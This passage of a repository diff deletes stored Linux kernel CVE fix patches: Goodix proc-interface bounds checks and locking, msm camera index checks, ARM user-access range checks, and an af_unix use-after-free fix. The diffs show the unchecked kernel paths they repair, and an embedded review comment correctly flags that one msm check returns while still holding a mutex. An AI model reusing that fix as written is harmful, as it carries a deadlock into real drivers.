-@@ -53,6 +54,8 @@ static struct i2c_client *gt_client; - - static struct proc_dir_entry *goodix_proc_entry; - -+static struct mutex lock; -+ - static s32 goodix_tool_write(struct file *filp, const char __user *buff, - unsigned long len, void *data); - static s32 goodix_tool_read(char *page, char **start, off_t off, int count, -@@ -188,7 +191,7 @@ static void unregister_i2c_func(void) - - s32 init_wr_node(struct i2c_client *client) - { -- s32 i; -+ u8 i; - - gt_client = client; - memset(&cmd_head, 0, sizeof(cmd_head)); -@@ -202,8 +205,8 @@ s32 init_wr_node(struct i2c_client *client) - i--; - } - if (i) { -- DATA_LENGTH = i * DATA_LENGTH_UINT + GTP_ADDR_LENGTH; -- GTP_INFO("Applied memory size:%d.", DATA_LENGTH); -+ DATA_LENGTH = i * DATA_LENGTH_UINT; -+ dev_dbg(&client->dev, "Applied memory size:%d.", DATA_LENGTH); - } else { - GTP_ERROR("Apply for memory failed."); - return FAIL; -@@ -214,8 +217,9 @@ s32 init_wr_node(struct i2c_client *client) - - 
register_i2c_func(); - -+ mutex_init(&lock); - tool_set_proc_name(procname); -- goodix_proc_entry = create_proc_entry(procname, 0666, NULL); -+ goodix_proc_entry = create_proc_entry(procname, 0660, NULL); - if (goodix_proc_entry == NULL) { - GTP_ERROR("Couldn't create proc entry!"); - return FAIL; -@@ -334,9 +338,13 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - GTP_DEBUG_FUNC(); - GTP_DEBUG_ARRAY((u8 *)buff, len); - -+ mutex_lock(&lock); - ret = copy_from_user(&cmd_head, buff, CMD_HEAD_LENGTH); -- if (ret) -+ if (ret) { - GTP_ERROR("copy_from_user failed."); -+ ret = -EACCES; -+ goto exit; -+ } - - GTP_DEBUG("wr :0x%02x.", cmd_head.wr); - GTP_DEBUG("flag:0x%02x.", cmd_head.flag); -@@ -354,6 +362,19 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - GTP_DEBUG("len:%d.", (s32)len); - GTP_DEBUG("buf[20]:0x%02x.", buff[CMD_HEAD_LENGTH]); - -+ if (cmd_head.data_len > (DATA_LENGTH - GTP_ADDR_LENGTH)) { -+ pr_err("data len %d > data buff %d, rejected!\n", -+ cmd_head.data_len, (DATA_LENGTH - GTP_ADDR_LENGTH)); -+ ret = -EINVAL; -+ goto exit; -+ } -+ if (cmd_head.addr_len > GTP_ADDR_LENGTH) { -+ pr_err(" addr len %d > data buff %d, rejected!\n", -+ cmd_head.addr_len, GTP_ADDR_LENGTH); -+ ret = -EINVAL; -+ goto exit; -+ } -+ - if (cmd_head.wr == 1) { - /* copy_from_user(&cmd_head.data[cmd_head.addr_len], - &buff[CMD_HEAD_LENGTH], cmd_head.data_len); */ -@@ -373,7 +394,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - if (cmd_head.flag == 1) { - if (FAIL == comfirm()) { - GTP_ERROR("[WRITE]Comfirm fail!"); -- return FAIL; -+ ret = -EINVAL; -+ goto exit; - } - } else if (cmd_head.flag == 2) { - /* Need interrupt! 
*/ -@@ -382,7 +404,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - &cmd_head.data[GTP_ADDR_LENGTH - cmd_head.addr_len], - cmd_head.data_len + cmd_head.addr_len) <= 0) { - GTP_ERROR("[WRITE]Write data failed!"); -- return FAIL; -+ ret = -EIO; -+ goto exit; - } - - GTP_DEBUG_ARRAY( -@@ -391,7 +414,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - if (cmd_head.delay) - msleep(cmd_head.delay); - -- return cmd_head.data_len + CMD_HEAD_LENGTH; -+ ret = cmd_head.data_len + CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 3) { /* Write ic type */ - - ret = copy_from_user(&cmd_head.data[0], &buff[CMD_HEAD_LENGTH], -@@ -399,30 +423,40 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - if (ret) - GTP_ERROR("copy_from_user failed."); - -+ if (cmd_head.data_len > sizeof(IC_TYPE)) { -+ pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n", -+ cmd_head.data_len, sizeof(IC_TYPE)); -+ ret = -EINVAL; -+ goto exit; -+ } - memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len); - - register_i2c_func(); - -- return cmd_head.data_len + CMD_HEAD_LENGTH; -- } else if (cmd_head.wr == 3) { -+ ret = cmd_head.data_len + CMD_HEAD_LENGTH; -+ goto exit; -+ } else if (cmd_head.wr == 5) { - - /* memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len); */ - -- return cmd_head.data_len + CMD_HEAD_LENGTH; -+ ret = cmd_head.data_len + CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 7) { /* disable irq! */ - gtp_irq_disable(i2c_get_clientdata(gt_client)); - - #if GTP_ESD_PROTECT - gtp_esd_switch(gt_client, SWITCH_OFF); - #endif -- return CMD_HEAD_LENGTH; -+ ret = CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 9) { /* enable irq! 
*/ - gtp_irq_enable(i2c_get_clientdata(gt_client)); - - #if GTP_ESD_PROTECT - gtp_esd_switch(gt_client, SWITCH_ON); - #endif -- return CMD_HEAD_LENGTH; -+ ret = CMD_HEAD_LENGTH; -+ goto exit; - } else if (cmd_head.wr == 17) { - struct goodix_ts_data *ts = i2c_get_clientdata(gt_client); - ret = copy_from_user(&cmd_head.data[GTP_ADDR_LENGTH], -@@ -436,27 +470,41 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff, - ts->gtp_rawdiff_mode = false; - GTP_DEBUG("gtp leave rawdiff."); - } -- return CMD_HEAD_LENGTH; -+ ret = CMD_HEAD_LENGTH; -+ goto exit; - } - #ifdef UPDATE_FUNCTIONS - else if (cmd_head.wr == 11) { /* Enter update mode! */ -- if (FAIL == gup_enter_update_mode(gt_client)) -- return FAIL; -+ if (FAIL == gup_enter_update_mode(gt_client)) { -+ ret = -EBUSY; -+ goto exit; -+ } - } else if (cmd_head.wr == 13) { /* Leave update mode! */ - gup_leave_update_mode(); - } else if (cmd_head.wr == 15) { /* Update firmware! */ - show_len = 0; - total_len = 0; -+ if (cmd_head.data_len + 1 > DATA_LENGTH) { -+ pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n", -+ cmd_head.data_len + 1, DATA_LENGTH); -+ ret = -EINVAL; -+ goto exit; -+ } - memset(cmd_head.data, 0, cmd_head.data_len + 1); - memcpy(cmd_head.data, &buff[CMD_HEAD_LENGTH], - cmd_head.data_len); - -- if (FAIL == gup_update_proc((void *)cmd_head.data)) -- return FAIL; -+ if (FAIL == gup_update_proc((void *)cmd_head.data)) { -+ ret = -EBUSY; -+ goto exit; -+ } - } - #endif -+ ret = CMD_HEAD_LENGTH; - -- return CMD_HEAD_LENGTH; -+exit: -+ mutex_unlock(&lock); -+ return ret; - } - - /******************************************************* -@@ -470,10 +518,14 @@ Output: - static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - int *eof, void *data) - { -+ s32 ret; - GTP_DEBUG_FUNC(); - -+ mutex_lock(&lock); - if (cmd_head.wr % 2) { -- return FAIL; -+ pr_err("<< [READ]command head wrong\n"); -+ ret = -EINVAL; -+ goto exit; - } else if (!cmd_head.wr) { - u16 len = 0; 
- s16 data_len = 0; -@@ -482,7 +534,8 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - if (cmd_head.flag == 1) { - if (FAIL == comfirm()) { - GTP_ERROR("[READ]Comfirm fail!"); -- return FAIL; -+ ret = -EINVAL; -+ goto exit; - } - } else if (cmd_head.flag == 2) { - /* Need interrupt! */ -@@ -505,11 +558,12 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - else - len = data_len; - -- data_len -= DATA_LENGTH; -+ data_len -= len; - - if (tool_i2c_read(cmd_head.data, len) <= 0) { - GTP_ERROR("[READ]Read data failed!"); -- return FAIL; -+ ret = -EINVAL; -+ goto exit; - } - memcpy(&page[loc], &cmd_head.data[GTP_ADDR_LENGTH], - len); -@@ -525,15 +579,14 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - - GTP_DEBUG("Return ic type:%s len:%d.", page, - (s32)cmd_head.data_len); -- return cmd_head.data_len; -+ ret = cmd_head.data_len; -+ goto exit; - /* return sizeof(IC_TYPE_NAME); */ - } else if (cmd_head.wr == 4) { - page[0] = show_len >> 8; - page[1] = show_len & 0xff; - page[2] = total_len >> 8; - page[3] = total_len & 0xff; -- -- return cmd_head.data_len; - } else if (6 == cmd_head.wr) { - /* Read error code! */ - } else if (8 == cmd_head.wr) { /*Read driver version */ -@@ -544,6 +597,9 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count, - memcpy(page, GTP_DRIVER_VERSION, tmp_len); - page[tmp_len] = 0; - } -+ ret = cmd_head.data_len; - -- return cmd_head.data_len; -+exit: -+ mutex_unlock(&lock); -+ return ret; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-6123/ANY/0001.patch deleted file mode 100644 index fde5826b..00000000 --- a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0001.patch +++ /dev/null 
@@ -1,39 +0,0 @@
-From 7beb04ea945a7178e61d935918d3cb152996b558 Mon Sep 17 00:00:00 2001
-From: Alok Kediya
-Date: Mon, 9 Dec 2013 10:52:49 +0530
-Subject: msm: camera: Added bounds check for index parameter
-
-Bound check the index param from user space to avoid
-any invalid memory access.
-
-CRs-Fixed: 583366
-
-Change-Id: I0f887bb8f1fa5a69a55e23dbb522b3bb694ad27f
-Signed-off-by: Alok Kediya
----
- drivers/media/video/msm/server/msm_cam_server.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/media/video/msm/server/msm_cam_server.c b/drivers/media/video/msm/server/msm_cam_server.c
-index 5fc8e83..6e49082 100644
---- a/drivers/media/video/msm/server/msm_cam_server.c
-+++ b/drivers/media/video/msm/server/msm_cam_server.c
-@@ -1390,6 +1390,15 @@ static long msm_ioctl_server(struct file *file, void *fh,
- }
-
- mutex_lock(&g_server_dev.server_queue_lock);
-+
-+ if(u_isp_event.isp_data.ctrl.queue_idx < 0 ||
-+ u_isp_event.isp_data.ctrl.queue_idx >= MAX_NUM_ACTIVE_CAMERA) {
-+ pr_err("%s: Invalid index %d\n", __func__,
-+ u_isp_event.isp_data.ctrl.queue_idx);
-+ rc = -EINVAL;
-+ return rc;
-+ }
-+
- if (!g_server_dev.server_queue
- [u_isp_event.isp_data.ctrl.queue_idx].queue_active) {
- pr_err("%s: Invalid queue\n", __func__);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-6123/ANY/0002.patch
deleted file mode 100644
index eb0b7ef1..00000000
--- a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0002.patch
+++ /dev/null
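Review bot: The bounds check added to `msm_ioctl_server()` sits directly after `mutex_lock(&g_server_dev.server_queue_lock)` and leaves through `return rc;` without releasing that lock, so a rejected `queue_idx` would leave `server_queue_lock` held and stall every later caller that takes it. Add `mutex_unlock(&g_server_dev.server_queue_lock);` before the `return rc;`, or move the check above the `mutex_lock` call if `u_isp_event` is already fully populated at that point. The function body continues outside the hunk, so whether the neighbouring `Invalid queue` path has an unlock that could be shared cannot be confirmed from here.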
@@ -1,67 +0,0 @@ -From 60e4af06161d91d5aeaa04c7d6e9f4345a6acdd4 Mon Sep 17 00:00:00 2001 -From: Alok Kediya -Date: Thu, 10 Oct 2013 12:11:01 +0530 -Subject: msm:camera: Bounds and validity check for params - -Check the range and validity of parameters before accessing. - -CRs-fixed: 550607, 554434, 554436 - -Change-Id: I2d6aec4f9cb9385789c0df6a2c4abefe9e87539f -Signed-off-by: Alok Kediya ---- - drivers/media/video/msm/server/msm_cam_server.c | 20 ++++++++++++++++---- - 1 file changed, 16 insertions(+), 4 deletions(-) - -diff --git a/drivers/media/video/msm/server/msm_cam_server.c b/drivers/media/video/msm/server/msm_cam_server.c -index 4bda7a3..5fc8e83 100644 ---- a/drivers/media/video/msm/server/msm_cam_server.c -+++ b/drivers/media/video/msm/server/msm_cam_server.c -@@ -311,6 +311,13 @@ static int msm_ctrl_cmd_done(void *arg) - goto ctrl_cmd_done_error; - } - -+ if(command->queue_idx < 0 || -+ command->queue_idx >= MAX_NUM_ACTIVE_CAMERA) { -+ pr_err("%s: Invalid value OR index %d\n", __func__, -+ command->queue_idx); -+ goto ctrl_cmd_done_error; -+ } -+ - if (!g_server_dev.server_queue[command->queue_idx].queue_active) { - pr_err("%s: Invalid queue\n", __func__); - goto ctrl_cmd_done_error; -@@ -339,7 +346,8 @@ static int msm_ctrl_cmd_done(void *arg) - max_control_command_size); - goto ctrl_cmd_done_error; - } -- if (copy_from_user(command->value, uptr, command->length)) { -+ if (copy_from_user(command->value, (void __user *)uptr, -+ command->length)) { - pr_err("%s: copy_from_user failed, size=%d\n", - __func__, sizeof(struct msm_ctrl_cmd)); - goto ctrl_cmd_done_error; -@@ -2650,13 +2658,17 @@ int msm_server_send_ctrl(struct msm_ctrl_cmd *out, - struct msm_queue_cmd *event_qcmd; - struct msm_ctrl_cmd *ctrlcmd; - struct msm_cam_server_dev *server_dev = &g_server_dev; -- struct msm_device_queue *queue = -- &server_dev->server_queue[out->queue_idx].ctrl_q; -- -+ struct msm_device_queue *queue; - struct v4l2_event v4l2_evt; - struct msm_isp_event_ctrl *isp_event; - 
void *ctrlcmd_data;
-
-+ if(out->queue_idx < 0 || out->queue_idx >= MAX_NUM_ACTIVE_CAMERA) {
-+ pr_err("%s: Invalid index %d\n", __func__, out->queue_idx);
-+ return -EINVAL;
-+ }
-+ queue = &server_dev->server_queue[out->queue_idx].ctrl_q;
-+
- event_qcmd = kzalloc(sizeof(struct msm_queue_cmd), GFP_KERNEL);
- if (!event_qcmd) {
- pr_err("%s Insufficient memory. return", __func__);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-6282/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-6282/ANY/0001.patch
deleted file mode 100644
index 62f1b88a..00000000
--- a/Patches/Linux_CVEs/CVE-2013-6282/ANY/0001.patch
+++ /dev/null
@@ -1,253 +0,0 @@ -From 76565e3d786bed66f247c682bd9f591098522483 Mon Sep 17 00:00:00 2001 -From: Russell King -Date: Fri, 7 Sep 2012 18:22:28 +0100 -Subject: ARM: 7527/1: uaccess: explicitly check __user pointer when - !CPU_USE_DOMAINS - -The {get,put}_user macros don't perform range checking on the provided -__user address when !CPU_HAS_DOMAINS. - -This patch reworks the out-of-line assembly accessors to check the user -address against a specified limit, returning -EFAULT if is is out of -range. - -[will: changed get_user register allocation to match put_user] -[rmk: fixed building on older ARM architectures] - -CRs-Fixed: 504011 -Change-Id: I3818045a136fcdf72deb1371b132e090fd7ed643 -Reported-by: Catalin Marinas -Signed-off-by: Will Deacon -Cc: stable@vger.kernel.org -Signed-off-by: Russell King -Git-commit: 8404663f81d212918ff85f493649a7991209fa04 -Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git -Signed-off-by: Laura Abbott ---- - arch/arm/include/asm/assembler.h | 8 ++++++++ - arch/arm/include/asm/uaccess.h | 40 +++++++++++++++++++++++++++------------- - arch/arm/lib/getuser.S | 23 +++++++++++++++-------- - arch/arm/lib/putuser.S | 6 ++++++ - 4 files changed, 56 insertions(+), 21 deletions(-) - -diff --git a/arch/arm/include/asm/assembler.h b/arch/arm/include/asm/assembler.h -index 03fb936..5c8b3bf4 100644 ---- a/arch/arm/include/asm/assembler.h -+++ b/arch/arm/include/asm/assembler.h -@@ -320,4 +320,12 @@ - .size \name , . 
- \name - .endm - -+ .macro check_uaccess, addr:req, size:req, limit:req, tmp:req, bad:req -+#ifndef CONFIG_CPU_USE_DOMAINS -+ adds \tmp, \addr, #\size - 1 -+ sbcccs \tmp, \tmp, \limit -+ bcs \bad -+#endif -+ .endm -+ - #endif /* __ASM_ASSEMBLER_H__ */ -diff --git a/arch/arm/include/asm/uaccess.h b/arch/arm/include/asm/uaccess.h -index 71f6536..0a070e9 100644 ---- a/arch/arm/include/asm/uaccess.h -+++ b/arch/arm/include/asm/uaccess.h -@@ -101,28 +101,39 @@ extern int __get_user_1(void *); - extern int __get_user_2(void *); - extern int __get_user_4(void *); - --#define __get_user_x(__r2,__p,__e,__s,__i...) \ -+#define __GUP_CLOBBER_1 "lr", "cc" -+#ifdef CONFIG_CPU_USE_DOMAINS -+#define __GUP_CLOBBER_2 "ip", "lr", "cc" -+#else -+#define __GUP_CLOBBER_2 "lr", "cc" -+#endif -+#define __GUP_CLOBBER_4 "lr", "cc" -+ -+#define __get_user_x(__r2,__p,__e,__l,__s) \ - __asm__ __volatile__ ( \ - __asmeq("%0", "r0") __asmeq("%1", "r2") \ -+ __asmeq("%3", "r1") \ - "bl __get_user_" #__s \ - : "=&r" (__e), "=r" (__r2) \ -- : "0" (__p) \ -- : __i, "cc") -+ : "0" (__p), "r" (__l) \ -+ : __GUP_CLOBBER_##__s) - - #define get_user(x,p) \ - ({ \ -+ unsigned long __limit = current_thread_info()->addr_limit - 1; \ - register const typeof(*(p)) __user *__p asm("r0") = (p);\ - register unsigned long __r2 asm("r2"); \ -+ register unsigned long __l asm("r1") = __limit; \ - register int __e asm("r0"); \ - switch (sizeof(*(__p))) { \ - case 1: \ -- __get_user_x(__r2, __p, __e, 1, "lr"); \ -- break; \ -+ __get_user_x(__r2, __p, __e, __l, 1); \ -+ break; \ - case 2: \ -- __get_user_x(__r2, __p, __e, 2, "r3", "lr"); \ -+ __get_user_x(__r2, __p, __e, __l, 2); \ - break; \ - case 4: \ -- __get_user_x(__r2, __p, __e, 4, "lr"); \ -+ __get_user_x(__r2, __p, __e, __l, 4); \ - break; \ - default: __e = __get_user_bad(); break; \ - } \ -@@ -135,31 +146,34 @@ extern int __put_user_2(void *, unsigned int); - extern int __put_user_4(void *, unsigned int); - extern int __put_user_8(void *, unsigned long 
long); - --#define __put_user_x(__r2,__p,__e,__s) \ -+#define __put_user_x(__r2,__p,__e,__l,__s) \ - __asm__ __volatile__ ( \ - __asmeq("%0", "r0") __asmeq("%2", "r2") \ -+ __asmeq("%3", "r1") \ - "bl __put_user_" #__s \ - : "=&r" (__e) \ -- : "0" (__p), "r" (__r2) \ -+ : "0" (__p), "r" (__r2), "r" (__l) \ - : "ip", "lr", "cc") - - #define put_user(x,p) \ - ({ \ -+ unsigned long __limit = current_thread_info()->addr_limit - 1; \ - register const typeof(*(p)) __r2 asm("r2") = (x); \ - register const typeof(*(p)) __user *__p asm("r0") = (p);\ -+ register unsigned long __l asm("r1") = __limit; \ - register int __e asm("r0"); \ - switch (sizeof(*(__p))) { \ - case 1: \ -- __put_user_x(__r2, __p, __e, 1); \ -+ __put_user_x(__r2, __p, __e, __l, 1); \ - break; \ - case 2: \ -- __put_user_x(__r2, __p, __e, 2); \ -+ __put_user_x(__r2, __p, __e, __l, 2); \ - break; \ - case 4: \ -- __put_user_x(__r2, __p, __e, 4); \ -+ __put_user_x(__r2, __p, __e, __l, 4); \ - break; \ - case 8: \ -- __put_user_x(__r2, __p, __e, 8); \ -+ __put_user_x(__r2, __p, __e, __l, 8); \ - break; \ - default: __e = __put_user_bad(); break; \ - } \ -diff --git a/arch/arm/lib/getuser.S b/arch/arm/lib/getuser.S -index 11093a7..9b06bb4 100644 ---- a/arch/arm/lib/getuser.S -+++ b/arch/arm/lib/getuser.S -@@ -16,8 +16,9 @@ - * __get_user_X - * - * Inputs: r0 contains the address -+ * r1 contains the address limit, which must be preserved - * Outputs: r0 is the error code -- * r2, r3 contains the zero-extended value -+ * r2 contains the zero-extended value - * lr corrupted - * - * No other registers must be altered. (see -@@ -27,33 +28,39 @@ - * Note also that it is intended that __get_user_bad is not global. 
- */ - #include -+#include - #include - #include - - ENTRY(__get_user_1) -+ check_uaccess r0, 1, r1, r2, __get_user_bad - 1: TUSER(ldrb) r2, [r0] - mov r0, #0 - mov pc, lr - ENDPROC(__get_user_1) - - ENTRY(__get_user_2) --#ifdef CONFIG_THUMB2_KERNEL --2: TUSER(ldrb) r2, [r0] --3: TUSER(ldrb) r3, [r0, #1] -+ check_uaccess r0, 2, r1, r2, __get_user_bad -+#ifdef CONFIG_CPU_USE_DOMAINS -+rb .req ip -+2: ldrbt r2, [r0], #1 -+3: ldrbt rb, [r0], #0 - #else --2: TUSER(ldrb) r2, [r0], #1 --3: TUSER(ldrb) r3, [r0] -+rb .req r0 -+2: ldrb r2, [r0] -+3: ldrb rb, [r0, #1] - #endif - #ifndef __ARMEB__ -- orr r2, r2, r3, lsl #8 -+ orr r2, r2, rb, lsl #8 - #else -- orr r2, r3, r2, lsl #8 -+ orr r2, rb, r2, lsl #8 - #endif - mov r0, #0 - mov pc, lr - ENDPROC(__get_user_2) - - ENTRY(__get_user_4) -+ check_uaccess r0, 4, r1, r2, __get_user_bad - 4: TUSER(ldr) r2, [r0] - mov r0, #0 - mov pc, lr -diff --git a/arch/arm/lib/putuser.S b/arch/arm/lib/putuser.S -index 7db2599..3d73dcb9 100644 ---- a/arch/arm/lib/putuser.S -+++ b/arch/arm/lib/putuser.S -@@ -16,6 +16,7 @@ - * __put_user_X - * - * Inputs: r0 contains the address -+ * r1 contains the address limit, which must be preserved - * r2, r3 contains the value - * Outputs: r0 is the error code - * lr corrupted -@@ -27,16 +28,19 @@ - * Note also that it is intended that __put_user_bad is not global. 
- */
- #include
-+#include
- #include
- #include
-
- ENTRY(__put_user_1)
-+ check_uaccess r0, 1, r1, ip, __put_user_bad
- 1: TUSER(strb) r2, [r0]
- mov r0, #0
- mov pc, lr
- ENDPROC(__put_user_1)
-
- ENTRY(__put_user_2)
-+ check_uaccess r0, 2, r1, ip, __put_user_bad
- mov ip, r2, lsr #8
- #ifdef CONFIG_THUMB2_KERNEL
- #ifndef __ARMEB__
-@@ -60,12 +64,14 @@ ENTRY(__put_user_2)
- ENDPROC(__put_user_2)
-
- ENTRY(__put_user_4)
-+ check_uaccess r0, 4, r1, ip, __put_user_bad
- 4: TUSER(str) r2, [r0]
- mov r0, #0
- mov pc, lr
- ENDPROC(__put_user_4)
-
- ENTRY(__put_user_8)
-+ check_uaccess r0, 8, r1, ip, __put_user_bad
- #ifdef CONFIG_THUMB2_KERNEL
- 5: TUSER(str) r2, [r0]
- 6: TUSER(str) r3, [r0, #4]
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0001.patch b/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0001.patch
deleted file mode 100644
index be87c762..00000000
--- a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0001.patch
+++ /dev/null
@@ -1,320 +0,0 @@ -From 7d267278a9ece963d77eefec61630223fce08c6c Mon Sep 17 00:00:00 2001 -From: Rainer Weikusat -Date: Fri, 20 Nov 2015 22:07:23 +0000 -Subject: unix: avoid use-after-free in ep_remove_wait_queue - -Rainer Weikusat writes: -An AF_UNIX datagram socket being the client in an n:1 association with -some server socket is only allowed to send messages to the server if the -receive queue of this socket contains at most sk_max_ack_backlog -datagrams. This implies that prospective writers might be forced to go -to sleep despite none of the message presently enqueued on the server -receive queue were sent by them. In order to ensure that these will be -woken up once space becomes again available, the present unix_dgram_poll -routine does a second sock_poll_wait call with the peer_wait wait queue -of the server socket as queue argument (unix_dgram_recvmsg does a wake -up on this queue after a datagram was received). This is inherently -problematic because the server socket is only guaranteed to remain alive -for as long as the client still holds a reference to it. In case the -connection is dissolved via connect or by the dead peer detection logic -in unix_dgram_sendmsg, the server socket may be freed despite "the -polling mechanism" (in particular, epoll) still has a pointer to the -corresponding peer_wait queue. There's no way to forcibly deregister a -wait queue with epoll. - -Based on an idea by Jason Baron, the patch below changes the code such -that a wait_queue_t belonging to the client socket is enqueued on the -peer_wait queue of the server whenever the peer receive queue full -condition is detected by either a sendmsg or a poll. A wake up on the -peer queue is then relayed to the ordinary wait queue of the client -socket via wake function. The connection to the peer wait queue is again -dissolved if either a wake up is about to be relayed or the client -socket reconnects or a dead peer is detected or the client socket is -itself closed. 
This enables removing the second sock_poll_wait from -unix_dgram_poll, thus avoiding the use-after-free, while still ensuring -that no blocked writer sleeps forever. - -Signed-off-by: Rainer Weikusat -Fixes: ec0d215f9420 ("af_unix: fix 'poll for write'/connected DGRAM sockets") -Reviewed-by: Jason Baron -Signed-off-by: David S. Miller ---- - net/unix/af_unix.c | 183 +++++++++++++++++++++++++++++++++++++++++++++++------ - 1 file changed, 164 insertions(+), 19 deletions(-) - -(limited to 'net/unix/af_unix.c') - -diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c -index 955ec15..4e95bdf 100644 ---- a/net/unix/af_unix.c -+++ b/net/unix/af_unix.c -@@ -326,6 +326,118 @@ found: - return s; - } - -+/* Support code for asymmetrically connected dgram sockets -+ * -+ * If a datagram socket is connected to a socket not itself connected -+ * to the first socket (eg, /dev/log), clients may only enqueue more -+ * messages if the present receive queue of the server socket is not -+ * "too large". This means there's a second writeability condition -+ * poll and sendmsg need to test. The dgram recv code will do a wake -+ * up on the peer_wait wait queue of a socket upon reception of a -+ * datagram which needs to be propagated to sleeping would-be writers -+ * since these might not have sent anything so far. This can't be -+ * accomplished via poll_wait because the lifetime of the server -+ * socket might be less than that of its clients if these break their -+ * association with it or if the server socket is closed while clients -+ * are still connected to it and there's no way to inform "a polling -+ * implementation" that it should let go of a certain wait queue -+ * -+ * In order to propagate a wake up, a wait_queue_t of the client -+ * socket is enqueued on the peer_wait queue of the server socket -+ * whose wake function does a wake_up on the ordinary client socket -+ * wait queue. 
This connection is established whenever a write (or -+ * poll for write) hit the flow control condition and broken when the -+ * association to the server socket is dissolved or after a wake up -+ * was relayed. -+ */ -+ -+static int unix_dgram_peer_wake_relay(wait_queue_t *q, unsigned mode, int flags, -+ void *key) -+{ -+ struct unix_sock *u; -+ wait_queue_head_t *u_sleep; -+ -+ u = container_of(q, struct unix_sock, peer_wake); -+ -+ __remove_wait_queue(&unix_sk(u->peer_wake.private)->peer_wait, -+ q); -+ u->peer_wake.private = NULL; -+ -+ /* relaying can only happen while the wq still exists */ -+ u_sleep = sk_sleep(&u->sk); -+ if (u_sleep) -+ wake_up_interruptible_poll(u_sleep, key); -+ -+ return 0; -+} -+ -+static int unix_dgram_peer_wake_connect(struct sock *sk, struct sock *other) -+{ -+ struct unix_sock *u, *u_other; -+ int rc; -+ -+ u = unix_sk(sk); -+ u_other = unix_sk(other); -+ rc = 0; -+ spin_lock(&u_other->peer_wait.lock); -+ -+ if (!u->peer_wake.private) { -+ u->peer_wake.private = other; -+ __add_wait_queue(&u_other->peer_wait, &u->peer_wake); -+ -+ rc = 1; -+ } -+ -+ spin_unlock(&u_other->peer_wait.lock); -+ return rc; -+} -+ -+static void unix_dgram_peer_wake_disconnect(struct sock *sk, -+ struct sock *other) -+{ -+ struct unix_sock *u, *u_other; -+ -+ u = unix_sk(sk); -+ u_other = unix_sk(other); -+ spin_lock(&u_other->peer_wait.lock); -+ -+ if (u->peer_wake.private == other) { -+ __remove_wait_queue(&u_other->peer_wait, &u->peer_wake); -+ u->peer_wake.private = NULL; -+ } -+ -+ spin_unlock(&u_other->peer_wait.lock); -+} -+ -+static void unix_dgram_peer_wake_disconnect_wakeup(struct sock *sk, -+ struct sock *other) -+{ -+ unix_dgram_peer_wake_disconnect(sk, other); -+ wake_up_interruptible_poll(sk_sleep(sk), -+ POLLOUT | -+ POLLWRNORM | -+ POLLWRBAND); -+} -+ -+/* preconditions: -+ * - unix_peer(sk) == other -+ * - association is stable -+ */ -+static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other) -+{ -+ int connected; -+ -+ 
connected = unix_dgram_peer_wake_connect(sk, other); -+ -+ if (unix_recvq_full(other)) -+ return 1; -+ -+ if (connected) -+ unix_dgram_peer_wake_disconnect(sk, other); -+ -+ return 0; -+} -+ - static int unix_writable(const struct sock *sk) - { - return sk->sk_state != TCP_LISTEN && -@@ -431,6 +543,8 @@ static void unix_release_sock(struct sock *sk, int embrion) - skpair->sk_state_change(skpair); - sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP); - } -+ -+ unix_dgram_peer_wake_disconnect(sk, skpair); - sock_put(skpair); /* It may now die */ - unix_peer(sk) = NULL; - } -@@ -666,6 +780,7 @@ static struct sock *unix_create1(struct net *net, struct socket *sock, int kern) - INIT_LIST_HEAD(&u->link); - mutex_init(&u->readlock); /* single task reading lock */ - init_waitqueue_head(&u->peer_wait); -+ init_waitqueue_func_entry(&u->peer_wake, unix_dgram_peer_wake_relay); - unix_insert_socket(unix_sockets_unbound(sk), sk); - out: - if (sk == NULL) -@@ -1033,6 +1148,8 @@ restart: - if (unix_peer(sk)) { - struct sock *old_peer = unix_peer(sk); - unix_peer(sk) = other; -+ unix_dgram_peer_wake_disconnect_wakeup(sk, old_peer); -+ - unix_state_double_unlock(sk, other); - - if (other != old_peer) -@@ -1472,6 +1589,7 @@ static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg, - struct scm_cookie scm; - int max_level; - int data_len = 0; -+ int sk_locked; - - wait_for_unix_gc(); - err = scm_send(sock, msg, &scm, false); -@@ -1550,12 +1668,14 @@ restart: - goto out_free; - } - -+ sk_locked = 0; - unix_state_lock(other); -+restart_locked: - err = -EPERM; - if (!unix_may_send(sk, other)) - goto out_unlock; - -- if (sock_flag(other, SOCK_DEAD)) { -+ if (unlikely(sock_flag(other, SOCK_DEAD))) { - /* - * Check with 1003.1g - what should - * datagram error -@@ -1563,10 +1683,14 @@ restart: - unix_state_unlock(other); - sock_put(other); - -+ if (!sk_locked) -+ 